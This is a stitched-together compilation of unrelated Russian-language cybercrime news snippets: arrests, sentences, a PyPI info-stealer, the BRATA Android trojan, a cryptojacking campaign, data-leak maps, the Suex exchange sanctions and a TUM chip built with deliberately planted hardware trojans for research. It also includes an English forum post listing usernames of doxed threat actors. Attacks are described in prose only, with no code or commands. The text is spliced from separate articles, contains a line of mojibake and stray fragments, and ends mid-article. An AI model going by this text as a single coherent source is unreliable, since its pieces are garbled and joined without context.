Чип представляет собой специализированную интегральную схему (ASIC). Такие специализированные микроконтроллеры часто производятся в больших количествах по спецификациям компаний. Команда TUM изменила дизайн микросхемы на основе стандарта RISC-V с открытым исходным кодом. Он используется все большим числом производителей микросхем и может заменить проприетарные подходы крупных компаний во многих областях. Возможности постквантовой криптографии микросхемы упрощаются за счет модификации ядра процессора и специальных инструкций, которые ускоряют необходимые арифметические операции.
В конструкцию также входит специально разработанный аппаратный ускоритель. Он не только поддерживает алгоритмы постквантовой криптографии на основе решетки, такие как Kyber, но также может работать с алгоритмом SIKE, который требует гораздо большей вычислительной мощности. По словам команды, чип, разработанный в TUM, может реализовать SIKE в 21 раз быстрее, чем чипы, использующие только программное шифрование. SIKE рассматривается как наиболее многообещающая альтернатива, если придет время, когда подходы на основе решеток уже не бдут безопасными. Подобные меры предосторожности имеют смысл в приложениях, где чипы будут использоваться в течение длительного времени.
Аппаратные трояны избегают постквантовой криптографии
Еще одна потенциальная угроза, наряду с ростом числа обычных атак, связана с аппаратными троянами. Компьютерные чипы обычно производятся в соответствии со спецификациями компаний и производятся на специализированных заводах. Если злоумышленникам удастся внедрить троянскую схему в конструкцию микросхемы до или во время стадии производства, это может иметь катастрофические последствия. Как и в случае внешних хакерских атак, целые фабрики могут быть закрыты или секреты производства украдены. Более того: трояны, встроенные в оборудование, могут уклоняться от постквантовой криптографии.
«Мы все еще очень мало знаем о том, как аппаратные трояны используются настоящими злоумышленниками», - объясняет Георг Зигл. «Чтобы разработать защитные меры, нам нужно думать как злоумышленник и пытаться разработать и скрыть наши собственные трояны. Поэтому в нашем постквантовом чипе мы разработали и установили четыре аппаратных трояна, каждый из которых работает совершенно по-своему».
Чип должен быть протестирован, а затем уничтожен
В ближайшие месяцы профессор Зигл и его команда будут интенсивно тестировать криптографические возможности и функциональность чипа, а также обнаруживаемость аппаратных троянов. Затем чип будет уничтожен - в исследовательских целях. В сложном процессе дорожки контура будут постепенно сбриваться при фотографировании каждого последующего слоя. Цель состоит в том, чтобы опробовать новые методы машинного обучения, разработанные на кафедре профессора Зигла, для восстановления точных функций микросхем даже при отсутствии документации. «Эти реконструкции могут помочь обнаружить компоненты микросхемы, которые выполняют функции, не связанные с реальными задачами микросхемы, и которые, возможно, были незаконно внесены в конструкцию», - говорит профессор.
• Source: https://techxplore.com/news/2021-08-chip-encryption-hackers.html
Сотрудники Отдела по борьбе с киберпреступлениями МВД по Республике Марий Эл при проведении оперативно-розыскных мероприятий задержали в г. Йошкар-Оле 32-летнюю местную жительницу, подозреваемую в неправомерном доступе к компьютерной информации.
По предварительным данным, злоумышленница, работая в салоне сотовой связи, имела доступ к базе данных телефонного оператора. Рассчитывая получить ежемесячную денежную надбавку за перевыполнение плана, она трижды перевыпускала сим-карты на абонентов, которые не подозревали об этом и согласия не давали.
В отношении подозреваемой возбуждено уголовное дело по признакам преступления, предусмотренного частью 3 статьи 272 Уголовного кодекса Российской Федерации. Фигурантке избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
Расследование продолжается.
Суд Амстердама вынес приговор по делу 25-летнего Эркана Сезгина (Erkan Sezgin), который обвинялся сразу по нескольким пунктам масштабного уголовного дела. Сезгин, известный на RaidForums под ником DataBox, приобрел широкую известность после того, как выставил на продажу базы данных миллионов граждан Австрии.
Сезгин, который работал инженером по данным в Matrixian Group, был арестован в ноябре 2022 года и содержался под стражей до тех пор, пока в январе не были произведены аресты его подельников. При этом остальных арестованных пока не судили.
Помимо неоднократных попыток продажи баз данных с персональной информацией, Сезгину предъявлялись обвинения в разработке фишинговых сайтов и спам- рассылок, перехвате данных криптовалютных кошельков с помощью стилеров, отмывании криптовалюты на сумму в 717 тысяч евро, а также краже криптовалюты на 428 тысяч евро.
В итоге по всем этим пунктам Сезгин был признан виновным. Однако суд учел то, что кибервору всего 25 лет, а также отсутствие у него судимостей. В итоге Сезгину назначены два года в тюрьме (за вычетом уже отбытого срока), с последующим условным сроком на один год.
source: databreaches.net/former-raidforums-member-databox-sentenced-to-prison
Народный суд города Хошимин привлек к суду 16 вьетнамцев, которые могут стоять за ограблением и похищением криптовалюты на сумму 1,5 миллиона долларов. Интересно, что двое из обвиняемых - бывшие сотрудники полиции.
Вьетнам является одним из мировых лидеров по принятию криптовалюты. Несмотря на ее растущую популярность, правительство не ввело законодательную базу для этого класса активов.
По данным местных СМИ, вся драма началась в 2018 году, когда Ле Дук Нгуен посоветовал Хо Нгок Таю продать около 1 000 BTC (стоимость которых на тот момент составляла примерно $4,2 млн) для покупки других цифровых валют.
Тем не менее, инвестиции пошли не так, как планировалось, что заставило Тая поверить в то, что он стал жертвой криптовалютной аферы. Он не мог смириться с потерей и в мае 2020 года собрал команду, целью которой было вернуть активы.
Группа, состоящая из 16 человек (включая двух бывших офицеров полиции), отслеживала местонахождение Нгуена с помощью GPS-устройств, установленных на его автомобиле. Эти люди наняли фургон, купили реалистичное оружие и похитили цель под дулом пистолета.
Находясь под стражей, команда настояла на том, чтобы Нгуен перевел первоначальную сумму в 1 000 BTC на кошелек Тая. Однако банда поняла, что у его родственника нет запрошенной суммы, и восстановила криптовалюту "всего" на $1,5 млн. Позднее жертва была брошена в городе Тху Дук: примерно в 15 километрах к северу от центра Хошимина.
Правоохранительные органы вьетнамского города недавно привлекли к суду Тая и 15 его предполагаемых сообщников. Стоит отметить, что организатор операции первоначально признался, что стоял за преступлением. Однако в ходе следствия он отказался от своих показаний. Со своей стороны, остальные обвиняемые заявили, что думали, что Тай взыщет долг с Нгуена обычным путем, а не через похищение.
Суд в Бразилии запросил данные, которые Telegram технически получить не может.
Основатель мессенджера Telegram, Павел Дуров, заявил в своем канале, что миссия компании заключается в сохранении конфиденциальности и свободы слова по всему миру. Он отметил, что иногда Telegram вынужден покидать рынки, где местные законы противоречат этим принципам или навязывают технологически невозможные требования.
Дуров привел примеры стран, таких как Китай, Иран и Россия, которые ранее запретили Telegram из-за его принципиальной позиции по вопросу прав человека. Он подчеркнул, что такие события, хоть и прискорбны, предпочтительнее предательства пользователей и убеждений компании.
В контексте ситуации в Бразилии, Дуров сообщил, что суд запросил данные, которые технически невозможно получить для Telegram. В связи с этим мессенджер обжалует решение о блокировке и продолжает отстаивать право пользователей на конфиденциальность личной переписки.
Ранее Бразильский суд постановил заблокировать в стране Telegram из-за неполноты данных, предоставленных полиции. Кроме того, суд увеличил штраф для мессенджера, назначенный судом нижестоящей инстанции, в 10 раз до 1 млн реалов ($198 000 или больше 16 млн рублей) в сутки. решение суда связано с требованием полиции к Telegram предоставить данные администраторов и участников неонацистских групп, которые могут быть связаны с нападением на школу в Аракрусе, при котором погибли четыре человека.
В каталоге Python Package Index (PyPI) нашли очередной вредоносный пакет, но у этого экземпляра есть интересная особенность: авторы собрали его из кода других злонамеренных программ.
Исследователи полагают, что за созданием пакета стоят малоквалифицированные киберпреступники. Их задача заключалась в том, чтобы надёргать сторонний код из разных зловредов, а потом, объединив его, создать собственный пакет.
Вредонос обнаружили специалисты компании Kroll. Изначально пакет назывался «colourfool», но эксперты присвоили ему собственное имя — «Colour-Blind». Внутри можно было найти троян, открывающий удалённый доступ, а также зловред, похищающий данные жертвы.
«Функциональность софтового пакета сразу показалась нам подозрительной, а его активность — вредоносной», — говорится в [отчёте](https://www.kroll.com/en/insights/publications/cyber/pypi-packages- deliver-python-remote-access-tools) Kroll.
Например, подозрения вызвал жёстко заданный в коде URL, который использовался для загрузки дополнительных ресурсов из Сети. Кроме того, в пакете был файл в формате Python — code.py, способный красть информацию (отмечаются функции кейлогера и возможность сбора файлов cookies).
Попав на устройство, вредонос мог не только собирать пароли, но и завершать работу приложений, снимать скриншоты рабочего стола, вытаскивать IP-ардес и даже следить за жертвой с помощью встроенной камеры.
Эксперты также отметили несколько неуклюжие попытки обфусцировать вредоносный код. Есть и необычные ходы: авторы вредоносного пакета добавили игру «Змейка», которая, судя по всему, была полностью скопирована с GitHub-репозитория.
Испанские киберкопы и Секретная служба США ликвидировали банду базировавшихся в Мадриде мошенников. По оценке Национальной полиции Испании, менее чем за год девять адептов социальной инженерии украли у 200 граждан и юрлиц Северной Америки более 5 млн евро, хотя на самом деле суммарный ущерб мог превысить €7 миллионов.
Преступную группу возглавлял гражданин Нигерии, прибывший в Испанию из Панамы. Конфиденциальные данные сообщники выуживали с помощью фишинговых писем, смишинга (смс-фишинга) и вишинга (фишинга с использованием телефонии). В последнем случае звонки осуществлялись с подменных номеров и помогали собрать дополнительную информацию, которая впоследствии использовалась для отъема денег со счетов жертв.
Для аккумуляции краденых капиталов в разных испанских банках было открыто свыше 100 аккаунтов (по подложным документам). Отмывать деньги помогали наемники, которые обналичивали их в банкоматах, переводили за рубеж или конвертировали в криптовалюту.
При подготовке совместной операции по пресечению мошеннической деятельности правоохранители трех стран заручились поддержкой Евроюста. В ходе параллельных полицейских рейдов были произведены аресты: восемь в Испании, один в Майами.
При обыске у подозреваемых изъяли предметы роскоши общей стоимостью 200 тыс. евро. Были также заблокированы 74 банковских счета, на которых суммарно скопилось €500 тысяч.
В настоящее время киберпреступность в Испании на подъеме: по оценке Национальной полиции, каждое пятое преступление в стране совершается онлайн. В прошлом году были зафиксированы более 375,5 тыс. таких инцидентов — на 72% больше, чем в 2019 году, и на 352% больше в сравнении с 2015 годом. Телефонных мошенников можно вычислить по паузе после предоставления запрашиваемой информации: они ее тут же используют для вывода денег со счета.
• Source: policia.es/_es/comunicacion_prensa_detalle.php?ID=15307
РКН также поддержал требование Генпрокуратуры
В московском суде закончилось рассмотрение дела о признании Meta, владеющей
Facebook, Instagram и WhatsApp, экстремисткой организацией и запрете ее
деятельности в стране. Представители Meta просили суд отложить рассмотрения
иска Генпрокуратуры для подготовки позиции, но суд отказался. Meta признали
экстремисткой организацией, но не стали запрещать WhatsApp на территории РФ.
Сама Meta, в свою очередь, попросили суд отказать в удовлетворении иска.
Представители отметили, что уже изменили свою политику и заявляют о
недопустимости русофобии и призывов к насилию против россиян. В рамках
рассмотрения дела компании Meta суд отказал в проведении лингвистической
экспертизы.
Использование гражданами и компаниями Facebook, Instagram и WhatsApp не может быть признано экстремизмом, заявил в суде по делу о признании Meta (владеет этими соцсетями и мессенджером) экстремистской организацией, заявил прокурор.
Несмотря на возможную декриминализацию использования Facebook и Instagram, риски по-прежнему остаются. Так, привлечь к ответственности могут за публичную демонстрацию символики — «на сайте, на дверях магазина и кафе, на автомобиле, в соцсетях, на постерах, визитках» — это будет основанием для привлечения к административной ответственности вплоть до 15 суток ареста (статья 20.3 УК).
Прокуратура также не стала требовать запрета на работу WhatsApp в России. Представитель ведомства в суде также заявил, что социальные сети Meta серьезно влияют на общественное мнение.
11 марта стало известно, что Meta решила разрешить пользователям Facebook и Instagram в ряде стран призывать к насилию против российских военнослужащих. В компании уточнили, что аналогичные сообщения в отношении российских гражданских лиц будут блокироваться.
Злоумышленники научились удаленно стирать Android-смартфоны - это стало возможным благодаря вирусу BRATA. Кроме того, данная версия вируса может легко обходить антивирусные программы, пишет издание XDA Developers.
Вирус BRATA - не новый. Ранее он использовался для кражи данных банковских карт. Теперь же обновленная версия программы значительно "поумнела" - она может полностью удалить все данные на Android-смартфоне жертвы. Хакеры знают и примерное месторасположение жертвы - у вируса есть доступ к геопозиции смартфона через систему GPS.
"Вредоносную программу для Android-устройств BRATA впервые обнаружили в 2019 году. Она давала удаленный доступ к мобильным устройствам жертв преимущественно в Бразилии. Позднее вредоносное ПО было модифицировано, и в конце 2021 года оно активно атаковало пользователей онлайн-банкинга в Европе. Стали появляться новые варианты, каждый из которых нацелен на определенный банковский софт. Вредонос накладывает свои окна поверх легитимных банковских приложений, что позволяет перехватить учетные данные для входа", - рассказывает Даниил Чернов, директор Центра Solar appScreener компании "Ростелеком-Солар".
По словам эксперта, секрет успеха BRATA в том, что при установке вирус запрашивает высокий уровень доступа, включая права суперадминистратора. "Таким образом, хакеры получают полный пакет привилегий и могут выполнять любые действия в операционной системе. Получив полный контроль над системой, злоумышленники могут изменять, удалять системные файлы и папки", - говорит Чернов.
Основной способ распространения BRATA - через якобы СMС от банка. "В сообщении просят установить приложение, выполняющее критически важные функции безопасности. Оно должно защитить от финансовых краж и обезопасить все операции, которые пользователь выполняет через онлайн-банк. Это часто сопровождается звонком якобы из службы безопасности банка, представитель которого обращает внимание на СМС, просит в целях безопасности установить данную программу и предлагает консультацию в технических вопросах. "В этот момент главная задача злоумышленника - сделать так, чтобы пользователь установил приложение и предоставил ему высокий уровень привилегий, включая права суперадминистратора, просмотр уведомлений, скриншоты учетных данных, перехват второго фактора аутентификации", - поясняет специалист.
Вирус распространяется через якобы СМС от банка
Хакеры "сбрасывают" телефон жертвы в двух случаях. Во-первых, когда вредонос
BRATA успешно провел атаку и передал требуемые данные пользователя, а во-
вторых - когда обнаруживает, что его пытаются анализировать с помощью
антивирусного ПО.
Для защиты вполне достаточно запретить установку из сторонних источников, продолжает Виктор Чебышев, эксперт по кибербезопасности в "Лаборатории Касперского". Кроме того, он добавил, что, несмотря на то, что в России BRATA пока замечен не был, ему не составит труда появиться и тут.
По мнению Чебышева, BRATA отличается от других вирусов: "Злоумышленники зачастую пытаются сделать банковских троянцев максимально самостоятельными. Бывает так, что троянец сам запускает банковское приложение, осуществляет платеж и стирает следы присутствия. В случае с BRATA все наоборот: авторы троянца действует по схеме ручного контроля зараженного устройства через сбор скриншотов и удаленного доступа к экрану устройства".
Кроме того, эксперт усомнился в "профессионализме" хакеров. "Они внедрили функцию полной очистки устройства. Ее обычно содержат приложения типа "антивор", чтобы противодействовать чтению личных данных с устройств. Аналогичная функция есть в BRATA, но дело в том, что вызови троянец такую функцию, это сразу же обнаружит жертва, в то же время восстановить данные и установленные приложения не составит труда. Пользователь весьма быстро заподозрит, что что-то пошло не так. Но при этом злоумышленники уже не смогут контролировать устройство", - заключает Чебышев.
судоверфями"
Компания Gold Bond, владеющая грузовым терминалом и логистическим центром в Ашдоде, а также компанией "Маспенот Исраэль" ("Израильские судоверфи") в Хайфе, сообщила Тель-Авивской бирже, что ее компьютерная сеть и большая часть ее деятельности была парализована в результате хакерской атаки. Часть систем была отключена компанией, чтобы предотвратить дополнительный ущерб.
Согласно текущим оценкам, речь идет не об атаке с целью выкупа, а о целенаправленном создании помех работе компании и, возможно, попытке хищения информации.
Компания подчеркнула, что на данный момент не получала требований об уплате выкупа, и что она тесно сотрудничает с национальным управлением кибербезопасности для ликвидации последствий атаки.
Как сообщает "Калькалист", судя по всему, за атакой стоит пропалестинская хакерская группа, именующая себя Hackers of Saviors, ранее не считавшаяся особо опасной.
Пострадали ли компьютеры "Израильских судоверфей", являющихся поставщиком вооружений ЦАХАЛу и другим армиям, не сообщается.
](https://www.cnews.ru/news/top/2021-01-14_google_i_apple_spasli_moskvichej)
ÐлаÑÑи ÐоÑÐºÐ²Ñ ÑоÑели ÑазвеÑнÑÑÑ ÑÐ»ÐµÐ¶ÐºÑ Ð·Ð° пеÑедвижениÑми каждого пеÑеÑода по MAC-адÑеÑам Ð¸Ñ Ð¼Ð¾Ð±Ð¸Ð»ÑнÑÑ ÑÑÑÑойÑÑв....
www.cnews.ru
Полиции Тайваня [арестовала](https://torrentfreak.com/apple-stealth-piracy- app-trio-combined-age-215-years-face-18-5m-damages-claim-241205/) трёх злоумышленников, которые предлагали инструкции по разблокировке пиратских приложений в App Store. Интересно, что схема была организована пиратской группой, общий возраст участников которой составил 215 лет.
Apple запрещает публиковать пиратские приложения в своём магазине. Однако
скрытые функции в, казалось бы, безобидных приложениях, таких как игры,
обходят защиту App Store, предлагая пользователям доступ к пиратским фильмам и
телешоу. Группировка предлагали инструкции по их разблокировке примерно 400
тыс. пользователям.
По данным Бюро уголовной полиции Тайваня, «две известные интернет- знаменитости» предоставляли руководства по активации скрытых функций в приложениях, а также предоставляли ссылки для загрузки. Они позволяли пользователям устанавливать такие приложения, как Multiple Choices и Shapes Find the Difference из App Store. Это открывало им доступ к контенту, принадлежащему члену Ассоциации распространения контента за рубежом, японской антипиратской группы, также известной как CODA.
Выяснилось, что участникам пиратской группы были трое мужчин в возрасте 73, 62 и 80 лет. Полиция обнаружила в технике хакеров 53 статьи, опубликованные на бэкэнде веб-сайта, 25 незаконных видеоприложений, а также изъяла у них 2 USB- флешки, iPad, смартфон и карту памяти.
Неназванный владелец авторских прав, стоящий за жалобой, оценивает рыночную стоимость нарушенного контента в 600 млн новых тайваньских долларов ($18,5 млн).
Все трое подозреваемых были арестованы по подозрению в нарушении Закона об авторских правах. Дело передали в прокуратуру округов Тайнань и Тайчжун для дальнейшего расследования.
Женщина решила что пора найти пассивный доход, и обратилась к левой конторе с целью инвестирования. Они несколько раз связывались с ней по видеосвязи, уговаривая заплатить за регистрацию на инвестиционном портале.
После этого, став жертвой аферистов, она открыла новую банковскую карту и в течение недели передала курьеру более 1,8 миллиона рублей, а затем ещё 400 тысяч.
Когда все её сбережения были исчерпаны, пожилая женщина решила взять в банке кредит на полмиллиона рублей и также передала эти средства мошенникам.
В сентябре 2022 года 17-летний череповчанин приобрёл у неизвестного архив с вредоносным программным обеспечением.
В мессенджере Telegram юноша создал вредоносные программы для нескольких человек, которые не знали о его преступных планах.
«С помощью таких программ данными лицами в последующем осуществлялось заражение других пользователей, в рамках которого выполнялось несанкционированное копирование компьютерной информации», - сообщает пресс- служба прокуратуры Вологодской области.
Полученные личные данные подросток продавал, а вырученные деньги тратил на свои нужды. Уголовное дело по ч.2 ст.273 УК РФ (Создание, использование и распространение вредоносных компьютерных программ) готовится к передаче в суд. Череповчанину грозит до пяти лет лишения свободы.
Оригинал: https://www.freebuf.com/news/204904{.}html
Недавно команда Guardicore Labs заявила, что обнаружила большое количество серверов MS-SQL и PHPMyAdmin, атакованных китайскими хакерами и используемых для добычи TurtleCoin, общим числом более 50 000 единиц.
Кампания была обнаружена в начале апреля и стартовала 26 февраля, нацелившись
на различные отрасли, включая здравоохранение, телекоммуникации, СМИ и
интернет. На атакуемых серверах устанавливается руткит, чтобы предотвратить
завершение работы вредоносной программы. По данным команды Guardicore, каждый
день добавляется более 700 новых жертв, а в ходе расследования было обнаружено
20 версий полезной нагрузки, причем каждую неделю создается как минимум одна
новая.
Команда Guardicore указала на определенного пост-доминантного игрока в Китае
из-за ряда особенностей поведения:
тот факт, что инструмент был написан на EPL, китайском языке программирования
некоторые файловые серверы, на которых была развернута серия вредоносных программ, имели HFS на китайском языке
многие файлы журналов и двоичные файлы на серверах содержат китайские строки, такие как "result-de-duplicate", "start" и т.д.
Для компрометации серверов Windows MS-SQL и PHPMyAdmin хакеры использовали ряд инструментов, включая сканеры портов, инструменты перебора MS-SQL и модули удаленного выполнения.
Сканер портов позволяет атакующему найти соответствующий сервер, проверяя, открыт ли порт MS-SQL по умолчанию, и автоматически отправляет инструмент брутфорса. После взлома сервера злоумышленник заражает компьютер скриптом и выполняет серию команд, после чего автоматически загружает вредоносную полезную нагрузку и запускает ее.
Вредонос использует известную уязвимость повышения привилегий (CVE-2014-4113)
для получения прав администратора в системе, после чего загружает вредоносное
ПО и автоматически начинает добычу TurtleCoin.
Проанализировав образцы, исследователи Guardicore обнаружили, что возможности вредоносного ПО включают в себя:
Майнинг криптовалюты;
Обеспечение стойкости путем переписывания реестра;
Использование руткита для защиты процесса майнинга от завершения;
Применение механизма "watchdog" для обеспечения непрерывной работы майнинга..
Среди большого количества полезных нагрузок, размещенных на зараженном сервере, был случайно названный VMProtect-обфусцированный драйвер режима ядра
Кроме того, вредоносная программа содержит другие функции руткита, такие как
взаимодействие с физическими аппаратными устройствами и модификация внутренних
процессов Windows, которые не используются данной конкретной вредоносной
программой. Его драйвер в режиме ядра гарантирует, что процессы вредоносной
программы не будут прерваны, а программа поддерживает практически все версии
Windows от Windows 7 до Windows 10, включая бета-версии.
Команда Guardicore предоставила полный список IoCs [портал] для этой кампании криптоджекинга, включая хэш, IP-адреса, использованные во время атаки, и пул для майнинга, а также загрузила сценарий Powershell [портал] для поиска остатков активности Nansh0u на зараженных машинах и обнаружения потенциально зараженных серверов.
Команда также заявила, что эта хакерская кампания еще раз доказывает, что обычные пароли по-прежнему являются самым слабым звеном в современном процессе атак. Видя тысячи серверов, потерянных в результате атак методом перебора из- за простых паролей, мы настоятельно рекомендуем пользователям, предприятиям и организациям использовать надежные пароли и сегментацию сети для защиты своих сетевых активов.
Киберполиция разоблачила злоумышленника, который сбывал базы с персональными данными граждан Украины и Европейского Союза. Об этом сообщили в Национальной полиции.
Отмечается, что 36-летний житель Нетишина был администратором закрытых групп и каналов в мессенджере Telegram, где осуществлял продажу персональных данных граждан Украины и ЕС. В распоряжении злоумышленника были сведения о паспортных данных, номерах налогоплательщиков, свидетельствах о рождении, водительских удостоверениях, данных банковских счетов.
В общем базы содержали персональную информацию более 300 млн человек. В зависимости от объема данных фигурант просил за них от 500 до 2000 долларов.
Установлено, что покупателями были и граждане РФ. Оплату за продажу баз данных россиянам фигурант получал с помощью запрещенных на территории Украины валют.
В доме злоумышленника правоохранители провели обыск. Изъяты мобильные телефоны, 30 жестких дисков, SIM-карты, компьютерная техника и серверное оборудование, на котором киберполицейские обнаружили базы данных с ограниченным доступом.
В полиции рассказали, что подозреваемый препятствовал проведению следственных действий, а позже нанес сотруднику киберполиции телесные повреждения. Фигурант был задержан.
source: npu.gov.ua/news/kiberpolitsiia-vykryla-zlovmysnyka-u-zbuti-baz-iz- personalnymy-danymy-hromadian-ukrainy-ta-ies
Figured I'd list a small group of people doxed by non-government or non- government backed researchers. This list is those from the past 6 months done by independant researchers. I Have listed them by username only. 1 is a forum member unfortunately I am unsure if they're aware of the doxing & I have edited this header after listing everyone who's been de-anonymized. If you see anyone on this list & you're working with them or for them I'd recommend you stop doing so immediately most of the users listed have had their passport, Social Medias and more leaked by just 3-4 researchers alone, 1-2 by corporations but it's pointless to even bother listing who was doxed by whom.
Without further or do & this thread maybe deleted by Admins for unknown reasons but here it goes
Spoiler: Identified people by username/group
WhiteDoxbin/Lapsus$ - Lapsus$
FuckMox - Lapsus$ (Doxed by Arion AKA Lapsus$)
Sheriff - Conti, GrandCrab, ReVil
Mr. Racoon - Dev of Racoon Stealer
2 unknown Dark web Vendors
Henry - Trickbot
Gunz - Trickbot Member
Verto -Trickbot
Wild/Neo - RU Police/Trickbot Member
marmalade - (I was unaware of this until I rechecked my
listings)
2 More Racoon Developers
koteiii - Conti
Faster - Conti
uriipavlolv - Botnet dev?
carrol - Cryptographer team member - Conti
naned - Conti
stanx - Krebs did it? (Unknown group, Looks like a Swedish male model)
zulas - Conti Dev
x4k - HelloXD Ransomware
Chocomska - Unknown Group, Pedophile I guess?
HackTeam - LOLZForum member
Foodle - Multiple things, Infostealer/Fraud
Wav - Ransomware Actor, Former ATM Skimmer
Mazzar - Killnet
For their security/safety I will not post their details but this list is incomplete and serves as a warning to those working with them. I'd like to also say: No one is untouchable, Stay safe & Take care.... I am going to wait and see if the devs ban me for sharing the news.
Неизвестные, создавшие карту с визуализацией слитых данных пользователей
«Яндекс.Еды», дополнили ее новой порцией информации. 23 марта карту со
сведениями клиентов «Яндекс.Еды» обнаружили и распространили несколько
Telegram-каналов. В открытом доступе
оказались имена, адреса доставки, номера телефонов и траты пользователей за
полгода.
Об утечке «Яндекс»
сообщил еще 1
марта. Согласно заявлению компании, она произошла из-за «недобросовестных
действий одного из сотрудников».
Суд оштрафовал «Яндекс.Еду» на 60 000 рублей за утечку данных пользователей.
Несмотря на то, что сайт заблокировали в РФ, он продолжает работать, а его создатели дополняют карту новыми данными. Теперь на ней отображаются сведения из ГИБДД, ВТБ, СДЭК, Wildberries, «Билайна», Avito и других источников, пострадавших от утечек, пишет [Forbes](https://www.forbes.ru/tekhnologii/465853-v-seti-poavilas-karta-s- uteksimi-dannymi-gibdd-andeks-edy-i-sdek).
«Мы увидели, насколько цена нашей конфиденциальности не ценится, и решили запустить новую версию сайта. Суд оштрафовал «Яндекс.Еду» на 60 000 рублей за утечку данных клиентов, то есть наши адреса доставки и личностные данные стоят 0,009 рублей за пользователя (6397035 пользователей)», — говорится в сообщении на сайте.
Click to expand...
Российский программист Николай Толмачев стал жертвой телефонных мошенников, которые представились сотрудниками службы безопасности Альфа-Банка. Они украли у молодого человека больше миллиона рублей, и айтишник, активный пользователь Твиттера под ником mahavoid попросил о помощи у обитателей соцсетей.
За сутки удалось собрать достаточную сумму, уверяет Николай Толмачев. Молодой человек в декабре оформил кредит на 1,1 млн рублей, чтобы «обезопасить свои сбережения». И почти сразу же перевел все деньги на незнакомый счет, о чем подробно, в красках и эмоциях рассказал у себя на сайте.
Когда герой истории пришел в себя и понял, что его обманули, то обратился в банк и в полицию. В полиции заявление приняли, но сообщили, что шансов найти преступников и деньги практически нет. В банке сказали, что все понимают, но поделать ничего не могут: кредит он взял, код назвал, придется платить, и с процентами. Общая сумма к выплате составила 1,8 млн рублей, отдать ее нужно за пять лет. mahavoid попросил о помощи людей в соцсетях, и буквально за день подписчики собрали 1 150 000 рублей. Один из жертвователей анонимно перевел почти миллион. Сейчас Николай Толмачев планирует досрочно закрыть злополучный кредит, чтобы сэкономить на процентах. Деньги, оставшиеся после этого, обещает передать другим жертвам похожих разводок.
Любой сбор денег завершён. Карта и СБП отключены. Вы собрали мне денег даже немного больше, чем мне было нужно, и гораздо больше, чем я предполагал.
Спасибо всем откликнувшимся, и деньгами, и добрыми словами. — Махавоид (@mahavoid) December 28, 2021.
Некоторые комментаторы в том же Твиттере заподозрили самого героя в неискренности и желании заработать на красивой истории. Еще одна из самых популярных у телефонных мошенников схем в 2021 году — когда жертва возвращает деньги, переведенные ей якобы по ошибке.
source: mahavoid.ru/help
Нью-йоркский поклонник цифрового искусства потерял 15 NFT из коллекций Bored Ape Yacht Club и Mutant Ape Yacht Club, а также один NFT CloneX, на общую сумму $2.2 млн.
Художественный куратор нью-йоркской галереи Ross+Kramer, коллекционирующий уникальные токены, написал в Твиттере, что стал жертвой фишинга. Хакеры украли у него 16 невзаимозаменяемых токенов из трех разных коллекций: восемь NFT из Bored Ape Yacht Club, семь NFT из Mutant Ape Yacht Club и один NFT CloneX. Стоимость украденных криптоактивов оценивается примерно в $2.2 млн.
Пользователь нажал на ссылку, ведущую на «фишинговый контракт», замаскированный под подлинное приложение NFT, тем самым разрешив этому контракту тратить токены от его имени. Злоумышленнику уже удалось продать несколько присвоенных токенов на площадке OpenSea. К примеру, NFT CloneX был продан за 17 ETH. Остальные токены были заморожены платформой по запросу Крамера. Он заявил, что усвоил важный урок, и посоветовал другим коллекционерам использовать аппаратный кошелек, чтобы защитить свои токены от кражи.
На прошлой неделе от фишинговой атаки пострадали покупатели NFT Monkey Kingdom, которые потеряли 7 000 SOL на сумму $1.3 млн. По данным PhishLabs, в первой половине 2021 года общий объем фишинговых атак во всех отраслях вырос на 22%. Ранее Федеральное бюро расследований США (ФБР) тоже предупреждало общественность об увеличении количества фишинговых атак для кражи криптовалют.
Учитывая рост популярности NFT в этом году, злоумышленники используют это в своих целях, поэтому владельцам коллекционных токенов и любых других криптовалют стоит сохранять бдительность, чтобы не допустить дорогостоящих ошибок.
Кажется, в скором будущем Россия сможет претендовать на новый глобальный бренд: к «русским хакерам» могут прибавиться «русские криптоотмыватели». Начало на этой неделе положил минфин США, введя первые в истории санкции против криптовалютной компании — основанного россиянами обменника Suex, который, по версии Вашингтона, помогал отмывать деньги хакерам и кибермошенникам, а заодно проводил платежи крупнейшего в России маркетплейса наркотиков Hydra. Мы разобрались в бизнесе загадочного криптообменника и биографиях его основателей.
Что случилось
В прошлый вторник американские власти, выполняя обещание бороться с отмывателями хакерских доходов, данное после взлома оператора крупнейшего в США нефтепровода Colonial Pipeline, впервые в истории ввели санкции против криптовалютной компании. Попавший под санкции криптообменник (сюрприз) оказался российским. Речь о платформе SUEX OTC S.R.O, зарегистрированной в Чехии и имеющей офис в «Москва-Сити» и несколько физических обменников в российских городах. Почти все акционеры и руководители Suex — россияне.
По данным минфина США, Suex «содействовала операциям, связанным с незаконными доходами по меньшей мере от восьми способов вымогательства». За три года через платформу прошел $481 млн, полученный от незаконных операций. Более 40% транзакций на платформе связаны с преступной деятельностью, добавили в ведомстве. Санкции предусматривают блокировку активов компании на территории США. Кроме того, гражданам страны запрещено взаимодействовать с сервисом.
Для США атаки хакеров-вымогателей в последнее время стали проблемой национального масштаба. В начале мая хакеры атаковали трубопровод Colonial Pipeline, из-за чего в стране начался бензиновый кризис. За взломом стояла молодая на тот момент группировка DarkSide, у которой сразу же нашелся «русский след»: в DarkSide работают выходцы из России и стран Восточной Европы, а орудует группировка в странах, где не говорят по-русски. Группировка слыла профессиональной и очень эффективной — сумма полученных выкупов оценивается десятками миллионов долларов в год.
В начале июля президент США Джо Байден обсуждал вопрос об атаках хакеров- вымогателей на звонке с Владимиром Путиным, просил Россию пресекать такие атаки и предупреждал, что США будут принимать меры для защиты людей и критически важной инфраструктуры. Первое, за что всерьез взялись американские власти, — криптовалютные сервисы, с помощью которых хакеры получали вознаграждения от атакованных компаний. В июле Bloomberg сообщал, что власти США ужесточили контроль за криптотранзакциями, а в Белом доме появилась специальная комиссия по борьбе с хакерами, использующими вирусы-вымогатели. Первой крупной жертвой и стала Suex — снова компания с очень заметным «русским следом».
Что известно о SUEX
Криптообменник Suex, как [следует](https://home.treasury.gov/policy- issues/financial-sanctions/recent-actions/20210921) из документов OFAC, зарегистрирован по двум адресам. Один из них — в Праге, а второй — в «Москва- Сити», в люксе Q на 31-м этаже башни «Федерация». В блоге компании Chainalysis, отслеживающей транзакции в блокчейне и помогавшей в расследовании минфина США, подробно [рассказывается](https://blog.chainalysis.com/reports/ofac-sanction-suex- september-2021) о том, как был устроен бизнес Suex с 2018 года.
